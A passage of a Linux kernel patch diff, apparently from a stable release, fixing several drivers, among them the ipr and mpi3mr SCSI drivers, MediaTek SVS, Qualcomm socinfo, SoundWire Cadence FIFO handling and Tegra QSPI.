+ static void __init sun8i_h3_rtc_clk_init(struct device_node *node)
+@@ -379,7 +372,6 @@ static const struct sun6i_rtc_clk_data sun50i_h6_rtc_data = {
+ 	.fixed_prescaler = 32,
+ 	.has_prescaler = 1,
+ 	.has_out_clk = 1,
+-	.export_iosc = 1,
+ 	.has_losc_en = 1,
+ 	.has_auto_swt = 1,
+ };
+diff --git a/drivers/scsi/ipr.c b/drivers/scsi/ipr.c
+index 2022ffb450417..8c062afb2918d 100644
+--- a/drivers/scsi/ipr.c
++++ b/drivers/scsi/ipr.c
+@@ -1516,23 +1516,22 @@ static void ipr_process_ccn(struct ipr_cmnd *ipr_cmd)
+ }
+ 
+ /**
+- * strip_and_pad_whitespace - Strip and pad trailing whitespace.
+- * @i:		index into buffer
+- * @buf:		string to modify
++ * strip_whitespace - Strip and pad trailing whitespace.
++ * @i:		size of buffer
++ * @buf:	string to modify
+  *
+- * This function will strip all trailing whitespace, pad the end
+- * of the string with a single space, and NULL terminate the string.
++ * This function will strip all trailing whitespace and
++ * NUL terminate the string.
+  *
+- * Return value:
+- * 	new length of string
+  **/
+-static int strip_and_pad_whitespace(int i, char *buf)
++static void strip_whitespace(int i, char *buf)
+ {
++	if (i < 1)
++		return;
++	i--;
+ 	while (i && buf[i] == ' ')
+ 		i--;
+-	buf[i+1] = ' ';
+-	buf[i+2] = '\0';
+-	return i + 2;
++	buf[i+1] = '\0';
+ }
+ 
+ /**
+@@ -1547,19 +1546,21 @@ static int strip_and_pad_whitespace(int i, char *buf)
+ static void ipr_log_vpd_compact(char *prefix, struct ipr_hostrcb *hostrcb,
+ 				struct ipr_vpd *vpd)
+ {
+-	char buffer[IPR_VENDOR_ID_LEN + IPR_PROD_ID_LEN + IPR_SERIAL_NUM_LEN + 3];
+-	int i = 0;
++	char vendor_id[IPR_VENDOR_ID_LEN + 1];
++	char product_id[IPR_PROD_ID_LEN + 1];
++	char sn[IPR_SERIAL_NUM_LEN + 1];
+ 
+-	memcpy(buffer, vpd->vpids.vendor_id, IPR_VENDOR_ID_LEN);
+-	i = strip_and_pad_whitespace(IPR_VENDOR_ID_LEN - 1, buffer);
++	memcpy(vendor_id, vpd->vpids.vendor_id, IPR_VENDOR_ID_LEN);
++	strip_whitespace(IPR_VENDOR_ID_LEN, vendor_id);
+ 
+-	memcpy(&buffer[i], vpd->vpids.product_id, IPR_PROD_ID_LEN);
+-	i = strip_and_pad_whitespace(i + IPR_PROD_ID_LEN - 1, buffer);
++	memcpy(product_id, vpd->vpids.product_id, IPR_PROD_ID_LEN);
++	strip_whitespace(IPR_PROD_ID_LEN, product_id);
+ 
+-	memcpy(&buffer[i], vpd->sn, IPR_SERIAL_NUM_LEN);
+-	buffer[IPR_SERIAL_NUM_LEN + i] = '\0';
++	memcpy(sn, vpd->sn, IPR_SERIAL_NUM_LEN);
++	strip_whitespace(IPR_SERIAL_NUM_LEN, sn);
+ 
+-	ipr_hcam_err(hostrcb, "%s VPID/SN: %s\n", prefix, buffer);
++	ipr_hcam_err(hostrcb, "%s VPID/SN: %s %s %s\n", prefix,
++		     vendor_id, product_id, sn);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/mpi3mr/mpi3mr.h b/drivers/scsi/mpi3mr/mpi3mr.h
+index def4c5e15cd89..8a438f248a820 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr.h
++++ b/drivers/scsi/mpi3mr/mpi3mr.h
+@@ -955,19 +955,16 @@ struct scmd_priv {
+  * @chain_buf_count: Chain buffer count
+  * @chain_buf_pool: Chain buffer pool
+  * @chain_sgl_list: Chain SGL list
+- * @chain_bitmap_sz: Chain buffer allocator bitmap size
+  * @chain_bitmap: Chain buffer allocator bitmap
+  * @chain_buf_lock: Chain buffer list lock
+  * @bsg_cmds: Command tracker for BSG command
+  * @host_tm_cmds: Command tracker for task management commands
+  * @dev_rmhs_cmds: Command tracker for device removal commands
+  * @evtack_cmds: Command tracker for event ack commands
+- * @devrem_bitmap_sz: Device removal bitmap size
+  * @devrem_bitmap: Device removal bitmap
+- * @dev_handle_bitmap_sz: Device handle bitmap size
++ * @dev_handle_bitmap_bits: Number of bits in device handle bitmap
+  * @removepend_bitmap: Remove pending bitmap
+  * @delayed_rmhs_list: Delayed device removal list
+- * @evtack_cmds_bitmap_sz: Event Ack bitmap size
+  * @evtack_cmds_bitmap: Event Ack bitmap
+  * @delayed_evtack_cmds_list: Delayed event acknowledgment list
+  * @ts_update_counter: Timestamp update counter
+@@ -1128,7 +1125,6 @@ struct mpi3mr_ioc {
+ 	u32 chain_buf_count;
+ 	struct dma_pool *chain_buf_pool;
+ 	struct chain_element *chain_sgl_list;
+-	u16  chain_bitmap_sz;
+ 	void *chain_bitmap;
+ 	spinlock_t chain_buf_lock;
+ 
+@@ -1136,12 +1132,10 @@ struct mpi3mr_ioc {
+ 	struct mpi3mr_drv_cmd host_tm_cmds;
+ 	struct mpi3mr_drv_cmd dev_rmhs_cmds[MPI3MR_NUM_DEVRMCMD];
+ 	struct mpi3mr_drv_cmd evtack_cmds[MPI3MR_NUM_EVTACKCMD];
+-	u16 devrem_bitmap_sz;
+ 	void *devrem_bitmap;
+-	u16 dev_handle_bitmap_sz;
++	u16 dev_handle_bitmap_bits;
+ 	void *removepend_bitmap;
+ 	struct list_head delayed_rmhs_list;
+-	u16 evtack_cmds_bitmap_sz;
+ 	void *evtack_cmds_bitmap;
+ 	struct list_head delayed_evtack_cmds_list;
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 286a44506578b..758f7ca9e0ee8 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1128,7 +1128,6 @@ static int mpi3mr_issue_and_process_mur(struct mpi3mr_ioc *mrioc,
+ static int
+ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+ {
+-	u16 dev_handle_bitmap_sz;
+ 	void *removepend_bitmap;
+ 
+ 	if (mrioc->facts.reply_sz > mrioc->reply_sz) {
+@@ -1160,25 +1159,23 @@ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+ 		    "\tcontroller while sas transport support is enabled at the\n"
+ 		    "\tdriver, please reboot the system or reload the driver\n");
+ 
+-	dev_handle_bitmap_sz = mrioc->facts.max_devhandle / 8;
+-	if (mrioc->facts.max_devhandle % 8)
+-		dev_handle_bitmap_sz++;
+-	if (dev_handle_bitmap_sz > mrioc->dev_handle_bitmap_sz) {
+-		removepend_bitmap = krealloc(mrioc->removepend_bitmap,
+-		    dev_handle_bitmap_sz, GFP_KERNEL);
++	if (mrioc->facts.max_devhandle > mrioc->dev_handle_bitmap_bits) {
++		removepend_bitmap = bitmap_zalloc(mrioc->facts.max_devhandle,
++						  GFP_KERNEL);
+ 		if (!removepend_bitmap) {
+ 			ioc_err(mrioc,
+-			    "failed to increase removepend_bitmap sz from: %d to %d\n",
+-			    mrioc->dev_handle_bitmap_sz, dev_handle_bitmap_sz);
++				"failed to increase removepend_bitmap bits from %d to %d\n",
++				mrioc->dev_handle_bitmap_bits,
++				mrioc->facts.max_devhandle);
+ 			return -EPERM;
+ 		}
+-		memset(removepend_bitmap + mrioc->dev_handle_bitmap_sz, 0,
+-		    dev_handle_bitmap_sz - mrioc->dev_handle_bitmap_sz);
++		bitmap_free(mrioc->removepend_bitmap);
+ 		mrioc->removepend_bitmap = removepend_bitmap;
+ 		ioc_info(mrioc,
+-		    "increased dev_handle_bitmap_sz from %d to %d\n",
+-		    mrioc->dev_handle_bitmap_sz, dev_handle_bitmap_sz);
+-		mrioc->dev_handle_bitmap_sz = dev_handle_bitmap_sz;
++			 "increased bits of dev_handle_bitmap from %d to %d\n",
++			 mrioc->dev_handle_bitmap_bits,
++			 mrioc->facts.max_devhandle);
++		mrioc->dev_handle_bitmap_bits = mrioc->facts.max_devhandle;
+ 	}
+ 
+ 	return 0;
+@@ -2957,27 +2954,18 @@ static int mpi3mr_alloc_reply_sense_bufs(struct mpi3mr_ioc *mrioc)
+ 	if (!mrioc->pel_abort_cmd.reply)
+ 		goto out_failed;
+ 
+-	mrioc->dev_handle_bitmap_sz = mrioc->facts.max_devhandle / 8;
+-	if (mrioc->facts.max_devhandle % 8)
+-		mrioc->dev_handle_bitmap_sz++;
+-	mrioc->removepend_bitmap = kzalloc(mrioc->dev_handle_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->dev_handle_bitmap_bits = mrioc->facts.max_devhandle;
++	mrioc->removepend_bitmap = bitmap_zalloc(mrioc->dev_handle_bitmap_bits,
++						 GFP_KERNEL);
+ 	if (!mrioc->removepend_bitmap)
+ 		goto out_failed;
+ 
+-	mrioc->devrem_bitmap_sz = MPI3MR_NUM_DEVRMCMD / 8;
+-	if (MPI3MR_NUM_DEVRMCMD % 8)
+-		mrioc->devrem_bitmap_sz++;
+-	mrioc->devrem_bitmap = kzalloc(mrioc->devrem_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->devrem_bitmap = bitmap_zalloc(MPI3MR_NUM_DEVRMCMD, GFP_KERNEL);
+ 	if (!mrioc->devrem_bitmap)
+ 		goto out_failed;
+ 
+-	mrioc->evtack_cmds_bitmap_sz = MPI3MR_NUM_EVTACKCMD / 8;
+-	if (MPI3MR_NUM_EVTACKCMD % 8)
+-		mrioc->evtack_cmds_bitmap_sz++;
+-	mrioc->evtack_cmds_bitmap = kzalloc(mrioc->evtack_cmds_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->evtack_cmds_bitmap = bitmap_zalloc(MPI3MR_NUM_EVTACKCMD,
++						  GFP_KERNEL);
+ 	if (!mrioc->evtack_cmds_bitmap)
+ 		goto out_failed;
+ 
+@@ -3415,10 +3403,7 @@ static int mpi3mr_alloc_chain_bufs(struct mpi3mr_ioc *mrioc)
+ 		if (!mrioc->chain_sgl_list[i].addr)
+ 			goto out_failed;
+ 	}
+-	mrioc->chain_bitmap_sz = num_chains / 8;
+-	if (num_chains % 8)
+-		mrioc->chain_bitmap_sz++;
+-	mrioc->chain_bitmap = kzalloc(mrioc->chain_bitmap_sz, GFP_KERNEL);
++	mrioc->chain_bitmap = bitmap_zalloc(num_chains, GFP_KERNEL);
+ 	if (!mrioc->chain_bitmap)
+ 		goto out_failed;
+ 	return retval;
+@@ -4189,10 +4174,11 @@ void mpi3mr_memset_buffers(struct mpi3mr_ioc *mrioc)
+ 		for (i = 0; i < MPI3MR_NUM_EVTACKCMD; i++)
+ 			memset(mrioc->evtack_cmds[i].reply, 0,
+ 			    sizeof(*mrioc->evtack_cmds[i].reply));
+-		memset(mrioc->removepend_bitmap, 0, mrioc->dev_handle_bitmap_sz);
+-		memset(mrioc->devrem_bitmap, 0, mrioc->devrem_bitmap_sz);
+-		memset(mrioc->evtack_cmds_bitmap, 0,
+-		    mrioc->evtack_cmds_bitmap_sz);
++		bitmap_clear(mrioc->removepend_bitmap, 0,
++			     mrioc->dev_handle_bitmap_bits);
++		bitmap_clear(mrioc->devrem_bitmap, 0, MPI3MR_NUM_DEVRMCMD);
++		bitmap_clear(mrioc->evtack_cmds_bitmap, 0,
++			     MPI3MR_NUM_EVTACKCMD);
+ 	}
+ 
+ 	for (i = 0; i < mrioc->num_queues; i++) {
+@@ -4318,16 +4304,16 @@ void mpi3mr_free_mem(struct mpi3mr_ioc *mrioc)
+ 		mrioc->evtack_cmds[i].reply = NULL;
+ 	}
+ 
+-	kfree(mrioc->removepend_bitmap);
++	bitmap_free(mrioc->removepend_bitmap);
+ 	mrioc->removepend_bitmap = NULL;
+ 
+-	kfree(mrioc->devrem_bitmap);
++	bitmap_free(mrioc->devrem_bitmap);
+ 	mrioc->devrem_bitmap = NULL;
+ 
+-	kfree(mrioc->evtack_cmds_bitmap);
++	bitmap_free(mrioc->evtack_cmds_bitmap);
+ 	mrioc->evtack_cmds_bitmap = NULL;
+ 
+-	kfree(mrioc->chain_bitmap);
++	bitmap_free(mrioc->chain_bitmap);
+ 	mrioc->chain_bitmap = NULL;
+ 
+ 	kfree(mrioc->transport_cmds.reply);
+@@ -4886,9 +4872,10 @@ int mpi3mr_soft_reset_handler(struct mpi3mr_ioc *mrioc,
+ 
+ 	mpi3mr_flush_delayed_cmd_lists(mrioc);
+ 	mpi3mr_flush_drv_cmds(mrioc);
+-	memset(mrioc->devrem_bitmap, 0, mrioc->devrem_bitmap_sz);
+-	memset(mrioc->removepend_bitmap, 0, mrioc->dev_handle_bitmap_sz);
+-	memset(mrioc->evtack_cmds_bitmap, 0, mrioc->evtack_cmds_bitmap_sz);
++	bitmap_clear(mrioc->devrem_bitmap, 0, MPI3MR_NUM_DEVRMCMD);
++	bitmap_clear(mrioc->removepend_bitmap, 0,
++		     mrioc->dev_handle_bitmap_bits);
++	bitmap_clear(mrioc->evtack_cmds_bitmap, 0, MPI3MR_NUM_EVTACKCMD);
+ 	mpi3mr_flush_host_io(mrioc);
+ 	mpi3mr_cleanup_fwevt_list(mrioc);
+ 	mpi3mr_invalidate_devhandles(mrioc);
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 3fc897336b5e0..3b61815979dab 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1280,7 +1280,7 @@ void mpi3mr_sas_host_add(struct mpi3mr_ioc *mrioc)
+ 
+ 	if (mrioc->sas_hba.enclosure_handle) {
+ 		if (!(mpi3mr_cfg_get_enclosure_pg0(mrioc, &ioc_status,
+-		    &encl_pg0, sizeof(dev_pg0),
++		    &encl_pg0, sizeof(encl_pg0),
+ 		    MPI3_ENCLOS_PGAD_FORM_HANDLE,
+ 		    mrioc->sas_hba.enclosure_handle)) &&
+ 		    (ioc_status == MPI3_IOCSTATUS_SUCCESS))
+diff --git a/drivers/soc/mediatek/mt8186-pm-domains.h b/drivers/soc/mediatek/mt8186-pm-domains.h
+index 108af61854a38..fce86f79c5055 100644
+--- a/drivers/soc/mediatek/mt8186-pm-domains.h
++++ b/drivers/soc/mediatek/mt8186-pm-domains.h
+@@ -304,7 +304,6 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 		.ctl_offs = 0x9FC,
+ 		.pwr_sta_offs = 0x16C,
+ 		.pwr_sta2nd_offs = 0x170,
+-		.caps = MTK_SCPD_KEEP_DEFAULT_OFF,
+ 	},
+ 	[MT8186_POWER_DOMAIN_ADSP_INFRA] = {
+ 		.name = "adsp_infra",
+@@ -312,7 +311,6 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 		.ctl_offs = 0x9F8,
+ 		.pwr_sta_offs = 0x16C,
+ 		.pwr_sta2nd_offs = 0x170,
+-		.caps = MTK_SCPD_KEEP_DEFAULT_OFF,
+ 	},
+ 	[MT8186_POWER_DOMAIN_ADSP_TOP] = {
+ 		.name = "adsp_top",
+@@ -332,7 +330,7 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 				MT8186_TOP_AXI_PROT_EN_3_CLR,
+ 				MT8186_TOP_AXI_PROT_EN_3_STA),
+ 		},
+-		.caps = MTK_SCPD_SRAM_ISO | MTK_SCPD_KEEP_DEFAULT_OFF | MTK_SCPD_ACTIVE_WAKEUP,
++		.caps = MTK_SCPD_SRAM_ISO | MTK_SCPD_ACTIVE_WAKEUP,
+ 	},
+ };
+ 
+diff --git a/drivers/soc/mediatek/mtk-svs.c b/drivers/soc/mediatek/mtk-svs.c
+index 0469c9dfeb04e..00526fd37d7b8 100644
+--- a/drivers/soc/mediatek/mtk-svs.c
++++ b/drivers/soc/mediatek/mtk-svs.c
+@@ -1324,7 +1324,7 @@ static int svs_init01(struct svs_platform *svsp)
+ 				svsb->pm_runtime_enabled_count++;
+ 			}
+ 
+-			ret = pm_runtime_get_sync(svsb->opp_dev);
++			ret = pm_runtime_resume_and_get(svsb->opp_dev);
+ 			if (ret < 0) {
+ 				dev_err(svsb->dev, "mtcmos on fail: %d\n", ret);
+ 				goto svs_init01_resume_cpuidle;
+@@ -1461,6 +1461,7 @@ static int svs_init02(struct svs_platform *svsp)
+ {
+ 	struct svs_bank *svsb;
+ 	unsigned long flags, time_left;
++	int ret;
+ 	u32 idx;
+ 
+ 	for (idx = 0; idx < svsp->bank_max; idx++) {
+@@ -1479,7 +1480,8 @@ static int svs_init02(struct svs_platform *svsp)
+ 							msecs_to_jiffies(5000));
+ 		if (!time_left) {
+ 			dev_err(svsb->dev, "init02 completion timeout\n");
+-			return -EBUSY;
++			ret = -EBUSY;
++			goto out_of_init02;
+ 		}
+ 	}
+ 
+@@ -1497,12 +1499,30 @@ static int svs_init02(struct svs_platform *svsp)
+ 		if (svsb->type == SVSB_HIGH || svsb->type == SVSB_LOW) {
+ 			if (svs_sync_bank_volts_from_opp(svsb)) {
+ 				dev_err(svsb->dev, "sync volt fail\n");
+-				return -EPERM;
++				ret = -EPERM;
++				goto out_of_init02;
+ 			}
+ 		}
+ 	}
+ 
+ 	return 0;
++
++out_of_init02:
++	for (idx = 0; idx < svsp->bank_max; idx++) {
++		svsb = &svsp->banks[idx];
++
++		spin_lock_irqsave(&svs_lock, flags);
++		svsp->pbank = svsb;
++		svs_switch_bank(svsp);
++		svs_writel_relaxed(svsp, SVSB_PTPEN_OFF, SVSEN);
++		svs_writel_relaxed(svsp, SVSB_INTSTS_VAL_CLEAN, INTSTS);
++		spin_unlock_irqrestore(&svs_lock, flags);
++
++		svsb->phase = SVSB_PHASE_ERROR;
++		svs_adjust_pm_opp_volts(svsb);
++	}
++
++	return ret;
+ }
+ 
+ static void svs_mon_mode(struct svs_platform *svsp)
+@@ -1594,12 +1614,16 @@ static int svs_resume(struct device *dev)
+ 
+ 	ret = svs_init02(svsp);
+ 	if (ret)
+-		goto out_of_resume;
++		goto svs_resume_reset_assert;
+ 
+ 	svs_mon_mode(svsp);
+ 
+ 	return 0;
+ 
++svs_resume_reset_assert:
++	dev_err(svsp->dev, "assert reset: %d\n",
++		reset_control_assert(svsp->rst));
++
+ out_of_resume:
+ 	clk_disable_unprepare(svsp->main_clk);
+ 	return ret;
+@@ -2385,14 +2409,6 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_free_resource;
+ 	}
+ 
+-	ret = devm_request_threaded_irq(svsp->dev, svsp_irq, NULL, svs_isr,
+-					IRQF_ONESHOT, svsp->name, svsp);
+-	if (ret) {
+-		dev_err(svsp->dev, "register irq(%d) failed: %d\n",
+-			svsp_irq, ret);
+-		goto svs_probe_free_resource;
+-	}
+-
+ 	svsp->main_clk = devm_clk_get(svsp->dev, "main");
+ 	if (IS_ERR(svsp->main_clk)) {
+ 		dev_err(svsp->dev, "failed to get clock: %ld\n",
+@@ -2414,6 +2430,14 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_clk_disable;
+ 	}
+ 
++	ret = devm_request_threaded_irq(svsp->dev, svsp_irq, NULL, svs_isr,
++					IRQF_ONESHOT, svsp->name, svsp);
++	if (ret) {
++		dev_err(svsp->dev, "register irq(%d) failed: %d\n",
++			svsp_irq, ret);
++		goto svs_probe_iounmap;
++	}
++
+ 	ret = svs_start(svsp);
+ 	if (ret) {
+ 		dev_err(svsp->dev, "svs start fail: %d\n", ret);
+diff --git a/drivers/soc/qcom/qcom_stats.c b/drivers/soc/qcom/qcom_stats.c
+index 6228af057120b..c207bb96c523a 100644
+--- a/drivers/soc/qcom/qcom_stats.c
++++ b/drivers/soc/qcom/qcom_stats.c
+@@ -92,7 +92,7 @@ static int qcom_subsystem_sleep_stats_show(struct seq_file *s, void *unused)
+ 	/* Items are allocated lazily, so lookup pointer each time */
+ 	stat = qcom_smem_get(subsystem->pid, subsystem->smem_item, NULL);
+ 	if (IS_ERR(stat))
+-		return -EIO;
++		return 0;
+ 
+ 	qcom_print_stats(s, stat);
+ 
+@@ -170,20 +170,14 @@ static void qcom_create_soc_sleep_stat_files(struct dentry *root, void __iomem *
+ static void qcom_create_subsystem_stat_files(struct dentry *root,
+ 					     const struct stats_config *config)
+ {
+-	const struct sleep_stats *stat;
+ 	int i;
+ 
+ 	if (!config->subsystem_stats_in_smem)
+ 		return;
+ 
+-	for (i = 0; i < ARRAY_SIZE(subsystems); i++) {
+-		stat = qcom_smem_get(subsystems[i].pid, subsystems[i].smem_item, NULL);
+-		if (IS_ERR(stat))
+-			continue;
+-
++	for (i = 0; i < ARRAY_SIZE(subsystems); i++)
+ 		debugfs_create_file(subsystems[i].name, 0400, root, (void *)&subsystems[i],
+ 				    &qcom_subsystem_sleep_stats_fops);
+-	}
+ }
+ 
+ static int qcom_stats_probe(struct platform_device *pdev)
+diff --git a/drivers/soc/qcom/socinfo.c b/drivers/soc/qcom/socinfo.c
+index ebcbf9b9c18bc..7ce28be9f435e 100644
+--- a/drivers/soc/qcom/socinfo.c
++++ b/drivers/soc/qcom/socinfo.c
+@@ -250,8 +250,6 @@ static const struct soc_id soc_id[] = {
+ 	{ qcom_board_id(MSM8926) },
+ 	{ qcom_board_id(MSM8326) },
+ 	{ qcom_board_id(MSM8916) },
+-	{ qcom_board_id(MSM8956) },
+-	{ qcom_board_id(MSM8976) },
+ 	{ qcom_board_id(MSM8994) },
+ 	{ qcom_board_id_named(APQ8074PRO_AA, "APQ8074PRO-AA") },
+ 	{ qcom_board_id_named(APQ8074PRO_AB, "APQ8074PRO-AB") },
+@@ -283,6 +281,8 @@ static const struct soc_id soc_id[] = {
+ 	{ qcom_board_id(MSM8616) },
+ 	{ qcom_board_id(MSM8992) },
+ 	{ qcom_board_id(APQ8094) },
++	{ qcom_board_id(MSM8956) },
++	{ qcom_board_id(MSM8976) },
+ 	{ qcom_board_id(MDM9607) },
+ 	{ qcom_board_id(APQ8096) },
+ 	{ qcom_board_id(MSM8998) },
+@@ -341,7 +341,6 @@ static const struct soc_id soc_id[] = {
+ 	{ qcom_board_id(IPQ6005) },
+ 	{ qcom_board_id(QRB5165) },
+ 	{ qcom_board_id(SM8450) },
+-	{ qcom_board_id(SM8550) },
+ 	{ qcom_board_id(SM7225) },
+ 	{ qcom_board_id(SA8295P) },
+ 	{ qcom_board_id(SA8540P) },
+@@ -352,6 +351,7 @@ static const struct soc_id soc_id[] = {
+ 	{ qcom_board_id(SC7280) },
+ 	{ qcom_board_id(SC7180P) },
+ 	{ qcom_board_id(SM6375) },
++	{ qcom_board_id(SM8550) },
+ 	{ qcom_board_id(QRU1000) },
+ 	{ qcom_board_id(QDU1000) },
+ 	{ qcom_board_id(QDU1010) },
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index 2de082765befa..c76381899ef49 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -116,8 +116,10 @@ static int xlnx_add_cb_for_notify_event(const u32 node_id, const u32 event, cons
+ 		INIT_LIST_HEAD(&eve_data->cb_list_head);
+ 
+ 		cb_data = kmalloc(sizeof(*cb_data), GFP_KERNEL);
+-		if (!cb_data)
++		if (!cb_data) {
++			kfree(eve_data);
+ 			return -ENOMEM;
++		}
+ 		cb_data->eve_cb = cb_fun;
+ 		cb_data->agent_data = data;
+ 
+diff --git a/drivers/soundwire/bus_type.c b/drivers/soundwire/bus_type.c
+index 04b3529f89293..963498db0fd22 100644
+--- a/drivers/soundwire/bus_type.c
++++ b/drivers/soundwire/bus_type.c
+@@ -105,20 +105,19 @@ static int sdw_drv_probe(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&slave->sdw_dev_lock);
+-
+ 	ret = drv->probe(slave, id);
+ 	if (ret) {
+ 		name = drv->name;
+ 		if (!name)
+ 			name = drv->driver.name;
+-		mutex_unlock(&slave->sdw_dev_lock);
+ 
+ 		dev_err(dev, "Probe of %s failed: %d\n", name, ret);
+ 		dev_pm_domain_detach(dev, false);
+ 		return ret;
+ 	}
+ 
++	mutex_lock(&slave->sdw_dev_lock);
++
+ 	/* device is probed so let's read the properties now */
+ 	if (drv->ops && drv->ops->read_prop)
+ 		drv->ops->read_prop(slave);
+@@ -167,14 +166,12 @@ static int sdw_drv_remove(struct device *dev)
+ 	int ret = 0;
+ 
+ 	mutex_lock(&slave->sdw_dev_lock);
+-
+ 	slave->probed = false;
++	mutex_unlock(&slave->sdw_dev_lock);
+ 
+ 	if (drv->remove)
+ 		ret = drv->remove(slave);
+ 
+-	mutex_unlock(&slave->sdw_dev_lock);
+-
+ 	dev_pm_domain_detach(dev, false);
+ 
+ 	return ret;
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index 27699f341f2c5..5213873221458 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -555,6 +555,29 @@ cdns_fill_msg_resp(struct sdw_cdns *cdns,
+ 	return SDW_CMD_OK;
+ }
+ 
++static void cdns_read_response(struct sdw_cdns *cdns)
++{
++	u32 num_resp, cmd_base;
++	int i;
++
++	/* RX_FIFO_AVAIL can be 2 entries more than the FIFO size */
++	BUILD_BUG_ON(ARRAY_SIZE(cdns->response_buf) < CDNS_MCP_CMD_LEN + 2);
++
++	num_resp = cdns_readl(cdns, CDNS_MCP_FIFOSTAT);
++	num_resp &= CDNS_MCP_RX_FIFO_AVAIL;
++	if (num_resp > ARRAY_SIZE(cdns->response_buf)) {
++		dev_warn(cdns->dev, "RX AVAIL %d too long\n", num_resp);
++		num_resp = ARRAY_SIZE(cdns->response_buf);
++	}
++
++	cmd_base = CDNS_MCP_CMD_BASE;
++
++	for (i = 0; i < num_resp; i++) {
++		cdns->response_buf[i] = cdns_readl(cdns, cmd_base);
++		cmd_base += CDNS_MCP_CMD_WORD_LEN;
++	}
++}
++
+ static enum sdw_command_response
+ _cdns_xfer_msg(struct sdw_cdns *cdns, struct sdw_msg *msg, int cmd,
+ 	       int offset, int count, bool defer)
+@@ -596,6 +619,10 @@ _cdns_xfer_msg(struct sdw_cdns *cdns, struct sdw_msg *msg, int cmd,
+ 		dev_err(cdns->dev, "IO transfer timed out, cmd %d device %d addr %x len %d\n",
+ 			cmd, msg->dev_num, msg->addr, msg->len);
+ 		msg->len = 0;
++
++		/* Drain anything in the RX_FIFO */
++		cdns_read_response(cdns);
++
+ 		return SDW_CMD_TIMEOUT;
+ 	}
+ 
+@@ -769,22 +796,6 @@ EXPORT_SYMBOL(cdns_read_ping_status);
+  * IRQ handling
+  */
+ 
+-static void cdns_read_response(struct sdw_cdns *cdns)
+-{
+-	u32 num_resp, cmd_base;
+-	int i;
+-
+-	num_resp = cdns_readl(cdns, CDNS_MCP_FIFOSTAT);
+-	num_resp &= CDNS_MCP_RX_FIFO_AVAIL;
+-
+-	cmd_base = CDNS_MCP_CMD_BASE;
+-
+-	for (i = 0; i < num_resp; i++) {
+-		cdns->response_buf[i] = cdns_readl(cdns, cmd_base);
+-		cmd_base += CDNS_MCP_CMD_WORD_LEN;
+-	}
+-}
+-
+ static int cdns_update_slave_status(struct sdw_cdns *cdns,
+ 				    u64 slave_intstat)
+ {
+diff --git a/drivers/soundwire/cadence_master.h b/drivers/soundwire/cadence_master.h
+index 0434d70d4b1f5..e0a64b28c6b9c 100644
+--- a/drivers/soundwire/cadence_master.h
++++ b/drivers/soundwire/cadence_master.h
+@@ -8,6 +8,12 @@
+ #define SDW_CADENCE_GSYNC_KHZ		4 /* 4 kHz */
+ #define SDW_CADENCE_GSYNC_HZ		(SDW_CADENCE_GSYNC_KHZ * 1000)
+ 
++/*
++ * The Cadence IP supports up to 32 entries in the FIFO, though implementations
++ * can configure the IP to have a smaller FIFO.
++ */
++#define CDNS_MCP_IP_MAX_CMD_LEN		32
++
+ /**
+  * struct sdw_cdns_pdi: PDI (Physical Data Interface) instance
+  *
+@@ -117,7 +123,12 @@ struct sdw_cdns {
+ 	struct sdw_bus bus;
+ 	unsigned int instance;
+ 
+-	u32 response_buf[0x80];
++	/*
++	 * The datasheet says the RX FIFO AVAIL can be 2 entries more
++	 * than the FIFO capacity, so allow for this.
++	 */
++	u32 response_buf[CDNS_MCP_IP_MAX_CMD_LEN + 2];
++
+ 	struct completion tx_complete;
+ 	struct sdw_defer *defer;
+ 
+diff --git a/drivers/spi/spi-tegra210-quad.c b/drivers/spi/spi-tegra210-quad.c
+index 9f356612ba7e5..06c54d49076ae 100644
+--- a/drivers/spi/spi-tegra210-quad.c
++++ b/drivers/spi/spi-tegra210-quad.c
+@@ -1156,6 +1156,10 @@ static int tegra_qspi_combined_seq_xfer(struct tegra_qspi *tqspi,
+ 				ret = -EIO;
+ 				goto exit;
+ 			}
++			if (!xfer->cs_change) {
++				tegra_qspi_transfer_end(spi);
++				spi_transfer_delay_exec(xfer);
++			}
+ 			break;
+ 		default:
+ 			ret = -EINVAL;
+@@ -1164,14 +1168,14 @@ static int tegra_qspi_combined_seq_xfer(struct tegra_qspi *tqspi,
+ 		msg->actual_length += xfer->len;
+ 		transfer_phase++;
+ 	}
+-	if (!xfer->cs_change) {
+-		tegra_qspi_transfer_end(spi);
+-		spi_transfer_delay_exec(xfer);
+-	}
+ 	ret = 0;
+ 
+ exit:
+ 	msg->status = ret;
++	if (ret < 0) {
++		tegra_qspi_transfer_end(spi);
++		spi_transfer_delay_exec(xfer);
++	}
+ 
+ 	return ret;
+ }
+@@ -1297,7 +1301,7 @@ static bool tegra_qspi_validate_cmb_seq(struct tegra_qspi *tqspi,
+ 	if (xfer->len > 4 || xfer->len < 3)
+ 		return false;
+ 	xfer = list_next_entry(xfer, transfer_list);
